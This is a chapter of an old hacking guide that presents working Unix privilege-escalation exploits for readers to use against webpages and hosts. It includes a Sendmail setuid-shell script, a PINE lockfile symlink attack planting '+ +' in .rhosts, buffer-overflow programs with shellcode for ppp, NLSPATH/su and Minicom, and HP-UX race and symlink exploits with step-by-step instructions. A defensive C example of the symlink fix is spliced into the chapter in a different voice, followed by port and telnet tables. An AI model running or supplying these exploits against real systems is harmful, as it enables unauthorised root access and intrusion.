Chapter 5: Telnet Exploits and Telnet

Well, exploits are the best way of hacking webpages, but they are also more complicated than hacking through ftp or using the phf. Before you can set up an exploit you must first have a telnet proggie; there are many different clients, you can just do a netsearch and find everything you need. It's best to get an account with your target (if possible) and view the glitches from the inside out. Exploits expose errors or bugs in systems and usually allow you to gain root access. There are many different exploits around and you can view each separately. I'm going to list a few below, but the list of exploits is endless.

This exploit is known as Sendmail v.8.8.4. It creates a suid program /tmp/x that calls shell as root. This is how you set it up:

    cat << _EOF_ >/tmp/x.c
    #define RUN "/bin/ksh"
    #include
    main()
    {
        execl(RUN,RUN,NULL);
    }
    _EOF_
    #
    cat << _EOF_ >/tmp/spawnfish.c
    main()
    {
        execl("/usr/lib/sendmail","/tmp/smtpd",0);
    }
    _EOF_
    #
    cat << _EOF_ >/tmp/smtpd.c
    main()
    {
        setuid(0);
        setgid(0);
        system("chown root /tmp/x ;chmod 4755 /tmp/x");
    }
    _EOF_
    #
    #
    gcc -O -o /tmp/x /tmp/x.c
    gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
    gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
    #
    /tmp/spawnfish
    kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
    rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
    sleep 5
    if [ -u /tmp/x ] ; then
        echo "leet..."
        /tmp/x
    fi

And now on to another exploit. I'm going to display the pine exploit through Linux. By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting the respective lockfile.
Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts (for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile. This was written by Sean B. Hamor... For this example, hamors is the victim while catluvr is the attacker:

    hamors (21 19:04) litterbox:~> pine

    catluvr (6 19:06) litterbox:~> ps -aux | grep pine
    catluvr   1739  0.0  1.8   100  356 pp3 S    19:07   0:00 grep pine
    hamors    1732  0.8  5.7   249 1104 pp2 S    19:05   0:00 pine

    catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
    -rw-rw-rw-   1 hamors   elite           4 Aug 26 19:05 .302.f5a4

    catluvr (8 19:07) litterbox:~> ps -aux | grep pine
    catluvr   1744  0.0  1.8   100  356 pp3 S    19:08   0:00 grep pine

    catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4

    hamors (23 19:09) litterbox:~> pine

    catluvr (11 19:10) litterbox:~> ps -aux | grep pine
    catluvr   1759  0.0  1.8   100  356 pp3 S    19:11   0:00 grep pine
    hamors    1756  2.7  5.1   226  992 pp2 S    19:10   0:00 pine

    catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4

    catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
    + +

    catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4

    catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors

Now on to another one; this will be the last one that I'm going to show. Exploitation script for the ppp vulnerability as described by no one to date; this is NOT FreeBSD-SA-96:15. Works on FreeBSD as tested. Mess with the numbers if it doesn't work.
This is how you set it up:

    #include
    #include
    #include

    #define BUFFER_SIZE 156 /* size of the buffer to overflow */
    #define OFFSET -290     /* number of bytes to jump after the start of the buffer */

    long get_esp(void)
    {
        __asm__("movl %esp,%eax\n");
    }

    main(int argc, char *argv[])
    {
        char *buf = NULL;
        unsigned long *addr_ptr = NULL;
        char *ptr = NULL;
        char execshell[] =
            "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
            "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
            "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */
            "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";    /* 15 bytes, 57 total */
        int i,j;

        buf = malloc(4096);

        /* fill start of buffer with nops */
        i = BUFFER_SIZE-strlen(execshell);
        memset(buf, 0x90, i);
        ptr = buf + i;

        /* place exploit code into the buffer */
        for(i = 0; i < strlen(execshell); i++)
            *ptr++ = execshell[i];

        addr_ptr = (long *)ptr;
        for(i=0;i < (104/4); i++)
            *addr_ptr++ = get_esp() + OFFSET;
        ptr = (char *)addr_ptr;
        *ptr = 0;

        setenv("HOME", buf, 1);
        execl("/usr/sbin/ppp", "ppp", NULL);
    }

More exploits:

-Hpux ppl exploit:

    #!/bin/ksh
    # ppl exploit, second part - SOD 15Oct96
    # not all buffer overruns need to force an address into the PC
    # works on 10.X, too, oddly enough.  - Script Junkie

    #HOST='localhost'
    #USER=`whoami`
    HOST="+"
    USER="+"

    cd /tmp
    rm core 2> /dev/null
    ln -s ~root/.rhosts core
    AAA='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaa'
    STUFF=`echo "${AAA}\n${HOST} ${USER}"`
    ppl -o "${STUFF}"
    rm core
    remsh localhost -l root sh -i

showdisk exploit:

    #!/bin/ksh
    # OK.. this bug gets inserted into remwatch after the patch.. It was there
    # before in some versions, but now it's pretty much universal if the patch
    # gets installed...
    # Silly Scriptor & friend, SOD, (11Jun96)

    if [ ! -x /usr/remwatch/bin/disks/showdisk ]
    then
        echo This is an exploit for the showdisk utility internal to
        echo HP\'s Remote Watch series of programs.
        echo The showdisk utility doesn\'t appear to be on your system.
        echo Moo
        exit
    fi

    FILE=$1
    if [ -z "$FILE" ]
    then
        FILE=/.rhosts
    fi

    if [ -f "$FILE" ]
    then
        echo "Hey, there already a ${FILE}!"
        echo "I'd rather enjoy making new files, thank you very much..."
        exit
    fi

    umask 0000
    /usr/remwatch/bin/disks/showdisk arg arg ${FILE} arg > /dev/null 2>&1 >${FILE}
    ls -l ${FILE}

    if [ "${FILE}" = "/.rhosts" ]
    then
        echo "Adding + + ..."
        echo "+ +" >> /.rhosts
        remsh localhost -l root ksh -i
    fi

glance exploit:

You need only do the following:

    1. Log in as yourself.
    2. Decide what file you want to create for world write.
    3. Do a umask 000.
    4. Then do /usr/perf/bin/glance -f
    5. After a few seconds, quit glance.
    6. That file will now be there and world writeable; now edit it.
    7. If it previously existed, it will be trunc'ed with orig perms.

sysdiag exploit:

Basically, the sysdiag stuff is set-uid root. You can exploit that feature to create and write stuff to arbitrary files on the system as root, while not being root. If the target file you want to create exists, this doesn't work. Perhaps there is a way around that, but that ain't the point. The point is that I used this to get root in 30 seconds on my HP's and that's not good. Heck, this is probably faster than asking for the root password !!!

More on the problem: What happens is that a feature exists to create a log file of your sysdiag session that can be invoked while in the program. You give it the name of the file to create, and if it is a sym link to a non-existent file, sysdiag follows the sym link and creates the file as root for you and logs your session in it. To show a typical vulnerability, I created /.rhosts from a sym link in /tmp that sysdiag followed and then caused sysdiag to echo the line "+ +" in to the file. Then I could rlogin as root.
If /.rhosts or /etc/hosts.equiv don't exist, you can use this trick to create and put a "+ +" in either of those files. That's an easy way to become root or someone else. You can do other files as well. This ain't cool, at all...

How I tested this on my system:

    1. I logged in with my regular account.
    2. I made a sym link with the command: ln -s /.rhosts /tmp/tempfile
    3. I ran the command: /bin/sysdiag
    4. From the DUI> prompt I typed: outfile /tmp/f1
    5. From the DUI> prompt I typed: + +
    6. From the DUI> prompt I typed: redo
    7. When my previous command echoed to the screen I pressed .
    8. From the DUI> prompt I typed: exit
    9. Now at the shell prompt, and out of sysdiag, I typed: rlogin localhost -l root
    10. Once logged in I typed: id and it said I was root...

This is the script of my sysdiag session:

    Script started on Sat Sep 21 23:29:10 1996
    $ id
    uid=1648(jjacobi) gid=999(systems)
    $ ls -l /tmp
    total 0
    $ ls -l /.rhosts
    /.rhosts not found
    $ ln -s /.rhosts /tmp/tempfile
    $ ls -l /tmp
    total 2
    lrwx--x--x   1 jjacobi    systems          8 Sep 21 23:29 tempfile -> /.rhosts
    $ ls -l /.rhosts
    /.rhosts not found
    $ /bin/sysdiag

sam exploit:

Go to your HP 9.04/5 system first.

    1. Log into your system as a normal user.
    2. Compile the program below, making any changes if you need to. (You shouldn't need to.)
    3. Log in on another terminal, become root and ensure that sam is not currently executing.
    4. As the normal user log in, run the program that you compiled in step 2.
    5. On the root log in session, run sam.
    6. Look at the target file.

    /* Code to exploit race of sam calling ioparser.sh
       It will usually cause the ioparser.sh script run by root to follow the
       sym links created here to create or truncate TARGET_FILENAME as root.
       It ain't pretty and may not always work, but usually does.
       Compile on HP9000/[700/800] 9.04[5] with the command:
         cc racer.c -o racer -Ae
    */
    #include
    #include
    #include
    #include
    #include
    #include
    #include

    #define PROC_TO_LOOK_FOR "sam"        /* The process to look for in ps */
    #define TARGET_FILENAME "/check_this" /* File that is created or trunc'ed */
    #define NUM_SYM_LINKS 50              /* Increase this for systems that fork() alot */

    void main(void)
    {
        char ps_buf[65536];  /* ps data buffer */
        char *line;          /* a pointer in to the ps_buf */
        char f1[80];         /* buffer space for the sym link name */
        char hostname[32];   /* buffer space to hold hostname, duh */
        int fd;              /* fd is for the pipe */
        int ext;             /* the extension to place on the symlink (pid) */
        int loop;            /* Dumb loop variable, suggestions ??? */

        unlink("ps_fifo");                          /* Why not */
        mkfifo("ps_fifo",S_IRUSR|S_IWUSR);          /* Need this */
        fd = open("ps_fifo",O_RDONLY|O_NONBLOCK);   /* You read the pipe */
        gethostname(hostname,32);   /* gets the hostname just like ioparser.sh !!! */
        printf("Looking for process %s, will exploit filename %s\n",PROC_TO_LOOK_FOR,TARGET_FILENAME);

        /* FIGURE THE REST OUT YOURSELF, IT AIN'T ARTWORK... */
        while(1)
        {
            system("/bin/ps -u 0 > ps_fifo");
            read(fd,ps_buf,65536);
            if( (line = strstr(ps_buf,PROC_TO_LOOK_FOR)) != NULL )
            {
                while( *line != '\n' )
                {
                    line--;
                }
                line+=2;
                line[5] = '\0';
                ext = atoi(line);
                for(loop = 1 ; loop <= NUM_SYM_LINKS ; loop ++)
                {
                    sprintf(f1,"/tmp/%s.%d",hostname,ext + loop);
                    symlink(TARGET_FILENAME,f1);
                }
                while( (access(TARGET_FILENAME,F_OK)) < 0 );
                printf("%s has run, wait a few seconds and check %s\n",PROC_TO_LOOK_FOR,TARGET_FILENAME);
                unlink("ps_fifo");
                exit();
            }
        }
    }

-Linux nlspath exploit:

    /*
     * NLSPATH buffer overflow exploit for Linux, tested on Slackware 3.1
     * Copyright (c) 1997 by Solar Designer
     */

    #include
    #include
    #include

    char *shellcode =
      "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
      "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
      "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
      "\xcd\x80/"
      "/bin/sh"
      "0";

    char *get_sp() {
      asm("movl %esp,%eax");
    }

    #define bufsize 2048

    char buffer[bufsize];

    main() {
      int i;

      for (i = 0; i < bufsize - 4; i += 4)
        *(char **)&buffer[i] = get_sp() - 3072;
      memset(buffer, 0x90, 512);
      memcpy(&buffer[512], shellcode, strlen(shellcode));
      buffer[bufsize - 1] = 0;

      setenv("NLSPATH", buffer, 1);
      execl("/bin/su", "/bin/su", NULL);
    }
    --- nlspath.c ---

And the shellcode separately:

    --- shellcode.s ---
    .text
    .globl shellcode
    shellcode:
            xorl %eax,%eax
            movb $0x31,%al
            int $0x80
            xchgl %eax,%ebx
            xorl %eax,%eax
            movb $0x17,%al
            int $0x80
            .byte 0x68
            popl %ecx
            popl %eax
            jmp *%ecx
            call *%esp
            xorl %eax,%eax
            cltd
            movl %ecx,%edi
            movb $'/'-1,%al
            incl %eax
            scasb %es:(%edi),%al
            jne -3
            movl %edi,(%ecx)
            movl %edx,4(%ecx)
            movl %edi,%ebx
            incl %eax
            scasb %es:(%edi),%al
            jne -3
            movb %dl,-1(%edi)
            movb $0x0B,%al
            int $0x80
            xorl %eax,%eax
            incl %eax
            xorl %ebx,%ebx
            int $0x80
            .byte '/'
            .string "/bin/sh0"

Minicom 1.75 exploit:

    #include
    #include
    #include
    #include
    #include

    #define NOP 0x90

    const char usage[] = "usage: %s stack-offset buffer-size argv0 argv1 ...\n";

    extern code();

    void dummy( void )
    {
        extern lbl();

        /* do "exec( "/bin/sh" ); exit(0)" */
        __asm__( "
    code:   xorl    %edx, %edx
            pushl   %edx
            jmp     lbl
    start2: movl    %esp, %ecx
            popl    %ebx
            movb    %edx, 0x7(%ebx)
            xorl    %eax, %eax
            movb    $0xB, %eax
            int     $0x80
            xorl    %ebx, %ebx
            xorl    %eax, %eax
            inc     %eax
            int     $0x80
    lbl:    call    start2
            .string \"/bin/sh\"
        ");
    }

    void Fatal( int rv, const char *fmt, ... )
    {
        va_list vl;

        va_start( vl, fmt );
        vfprintf( stderr, fmt, vl );
        va_end( vl );
        exit( rv );
    }

    int main( int ac, char **av )
    {
        int buff_addr;                      /* where our code is */
        int stack_offset = 0, buffer_size = 0, i, code_size;
        char *buffer, *p;

        buff_addr = (int)(&buff_addr);      /* get the stack pointer */
        code_size = strlen( (char *)code ); /* get the size of piece of */
                                            /* code in dummy() */
        if( ac < 5 )
            Fatal( -1, usage, *av );

        buff_addr -= strtol( av[ 1 ], NULL, 0 );
        buffer_size = strtoul( av[ 2 ], NULL, 0 );
        if( buffer_size < code_size + 4 )
            Fatal( -1, "buffer is too short -- %d minimum.\n", code_size + 5);
        /* "this is supported, but not implemented yet" ;) */

        if( (buffer = malloc( buffer_size )) == NULL )
            Fatal( -1, "malloc(): %s\n", strerror( errno ) );

        fprintf( stderr, "using buffer address 0x%8.8x\n", buff_addr );

        for( i = buffer_size - 4; i > buffer_size / 2; i -= 4 )
            *(int *)(buffer + i) = buff_addr;

        memset( buffer, NOP, buffer_size/2 );
        i = (buffer_size - code_size - 4)/2;
        memcpy( buffer + i, (char *)code, code_size );
        buffer[ buffer_size - 1 ] = '\0';

        p = malloc( strlen( av[ ac - 1 ] ) + code_size + 1 );
        if( !p )
            Fatal( -1, "malloc(): %s\n", strerror( errno ) );
        strcpy( p, av[ ac - 1 ] );
        strcat( p, buffer );
        av[ ac - 1 ] = p;

        execve( av[ 3 ], av + 3, NULL );
        perror( "exec():" );
    }

I will send out more exploits in the next book I write.
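The PINE lockfile, sysdiag, glance, showdisk and sam/ioparser.sh attacks above all hinge on one coding mistake: a privileged program creates a file at a path another user can pre-plant as a symlink. The following is an added example, not code from this text or from any of the programs it names, showing that mistake beside the hardened open() call that refuses a planted link; the directory and file names are constructed for the demo, and it assumes a POSIX system with O_NOFOLLOW (Linux, BSD).

```c
#define _GNU_SOURCE   /* O_NOFOLLOW, mkdtemp and symlink on glibc */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Vulnerable pattern, as in sysdiag, glance, showdisk and PINE's lockfile
 * handling above: a privileged process creates a path the user chose.  A
 * symlink planted there makes the file appear wherever the link points. */
int naive_create(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened pattern: O_EXCL fails if anything (even a dangling symlink)
 * already exists at the path, O_NOFOLLOW refuses a symlink as the final
 * component, and mode 0600 does not depend on the caller's umask. */
int safe_create(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Plant a lockfile-style symlink (constructed name) pointing at a file that
 * does not exist yet, then try both creators.  Returns 0 when the hardened
 * open refuses the link and the naive open creates the target. */
int compare_symlink_handling(void)
{
    char dir[] = "/tmp/symlink_demo.XXXXXX", link[64], target[64];
    int fd, rc = 0;
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(link, sizeof link, "%s/.302.f5a4", dir);
    snprintf(target, sizeof target, "%s/victim_rhosts", dir);
    if (symlink(target, link) != 0) { rmdir(dir); return 1; }
    fd = safe_create(link);             /* must fail with ELOOP or EEXIST */
    if (fd >= 0 || access(target, F_OK) == 0)
        rc = 2;                         /* hardened open followed the link */
    else if ((fd = naive_create(link)) < 0 || access(target, F_OK) != 0)
        rc = 3;                         /* naive open did not follow it */
    if (fd >= 0) close(fd);
    unlink(link); unlink(target); rmdir(dir);
    return rc;
}

int main(void)
{
    printf("result: %d (0 = only the naive open followed the symlink)\n",
           compare_symlink_handling());
    return 0;
}
```

The same O_EXCL|O_NOFOLLOW open, or writing only into a directory the privileged program owns, is the fix a defender would look for when auditing a setuid tool that writes user-named log or lock files.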
Common Ports

    Program / Name          Port
    ________________________________________________________________________
    discard                 9
    netstat                 15
    chargen                 19
    ftp                     21
    telnetd                 23
    smtp                    25
    rlp                     39
    bootp                   67
    finger                  79
    http                    80 / 8080
    military http           80 / 8080 / 5580
    link                    87
    pop3                    110
    identd                  113
    nntp                    119
    news                    144
    exec                    512
    login                   513
    pkill                   515
    talk                    517
    ntalk                   518
    netwall                 533
    rmonitor                560
    monitor                 561
    kerberos                750

Common telnet commands:

    Command     Function
    access      Telnet account
    c           Connect to a host
    cont        Continue
    d           Disconnect
    full        Network echo
    half        Terminal echo
    hangup      Hangs up
    mail        Mail
    set         Select PAD parameters
    stat        Show network port.
    telemail    Mail